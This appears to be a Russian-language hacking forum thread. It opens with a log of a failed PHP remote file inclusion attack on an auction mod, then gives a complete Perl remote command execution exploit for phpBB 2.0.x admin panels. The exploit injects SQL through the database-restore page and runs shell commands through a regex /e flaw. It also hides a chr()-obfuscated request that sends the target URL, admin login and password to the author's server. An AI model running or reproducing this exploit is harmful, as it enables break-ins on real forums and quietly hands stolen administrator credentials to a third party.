Warning: main(http://mysite.com/evilt.txtcommon.): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 27

Warning: main(): Failed opening 'http://mysite.com/evilt.txtcommon.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 27

Warning: main(http://mysite.com/evilt.txtauction/functions_blocks.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 28

Warning: main(): Failed opening 'http://mysite.com/evilt.txtauction/functions_blocks.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 28

Warning: main(http://mysite.com/evilt.txtauction/functions_general.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 29

Warning: main(): Failed opening 'http://mysite.com/evilt.txtauction/functions_general.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 29

Warning: main(http://mysite.com/evilt.txtauction/functions_validate.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 30

Warning: main(): Failed opening 'http://mysite.com/evilt.txtauction/functions_validate.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 30

Warning: main(http://mysite.com/evilt.txtauction/auction_constants.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 31

Warning: main(): Failed opening 'http://mysite.com/evilt.txtauction/auction_constants.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 31

Warning: main(http://mysite.com/evilt.txtincludes/functions_post.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 32

Warning: main(): Failed opening 'http://mysite.com/evilt.txtincludes/functions_post.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 32

Warning: main(http://mysite.com/evilt.txtlanguage/lang_english/lang_auction.): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 40

Warning: main(): Failed opening 'http://mysite.com/evilt.txtlanguage/lang_english/lang_auction.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 40

Warning: main(http://mysite.com/evilt.txtlanguage/lang_english/lang_main.): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 41

Warning: main(): Failed opening 'http://mysite.com/evilt.txtlanguage/lang_english/lang_main.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 41

Fatal error: Call to undefined function: init_auction_config() in /home/*****/public_html/auction/auction_common.php on line 45

http://www.*****.com/auction/auction_commo...t.txt&cmd=ls&z=


В чём у меня прокол?

 

[not null]

allow_url_fopen=0 (Off) <_<

 

[Winux]

phpBB admin 2 REmote Execution Exploit
В наборчик)

#!/usr/bin/perl

## r57phpbba2e2.pl - phpBB admin 2 exec exploit
## version 2 (based on user_sig_bbcode_uid bug)
## tested on 2.0.12 , 2.0.13 , 2.0.19
## --------------------------------------------
## screen
## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
## Command for execute or 'exit' for exit # id
## uid=80(www) gid=80(www) groups=80(www)
## Command for execute or 'exit' for exit # exit
## --------------------------------------------
## *** surprise included;)
## 20/02/06
## 1dt.w0lf
## RST/GHC (http://rst.void.ru , http://ghc.ru)

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

getopts("u:L:P:i:p:o:");

$url      = $opt_u;
$login    = $opt_L;
$password = $opt_P;
$id       = $opt_i || 2;
$prefix   = $opt_p || 'phpbb_';
$proxy    = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e220022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
 $res = $xpl->post($url.'login.php',
 [
 "username"   => "$login",
 "password"   => "$password",
 "autologin"  => "on",
 "admin"      => "1",
 "login"      => "Log in",
 ],"User-Agent" => "$ids");
 $cookie_jar->extract_cookies($res);
 if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }   
 $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
 while ()
 {
    print "Command for execute or 'exit' for exit # ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
     }
    &run($cmd);
 }
 
sub run($)
 {   
 $sql   = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
 &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);   
 $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
 @result = split(/\n/,$res->content);
 $data = '';
 $on = $start = $end = 0;
 for (@result)
  {
    if (/_END_/) { $end = 1; last; }
    if ($on) { $data .= $_."\n"; }
    if (/_START_/) { $on = 1; $start = 1; }
  }
 if($start&&$end) { print $data."\r\n"; }
 }
 
sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]",
Content_type => 'form-data',
Content      => [
                perform       => 'restore',
                restore_start => 'Start Restore',
                backup_file   => [
                                   undef,
                                   '0wneeeeedddd',
                                   Content_type => 'text/plain',
                                   Content => "$_[1]",
                                 ],
                ]
,"User-Agent" => "$ids");
}

sub usage()
 {
 &about();
 print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
 print " Options:\r\n";
 print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
 print " -L [login] - admin login\r\n";
 print " -P [password] - admin password\r\n";
 print " -i [id] - admin id (optional, default 2)\r\n";
 print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
 print " -o [host:port] - proxy (optional)\r\n";
 exit();
 }
 
sub about()
  {
  print "\\=-----------------------------------=/\r\n";
  print "| phpBB admin2exec exploit by RST/GHC |\r\n";
  print "| version 2 (user_sig_bbcode_uid)     |\r\n";
  print "/=-----------------------------------=\\\r\n";
  return 'http://rst.void.ru';
  }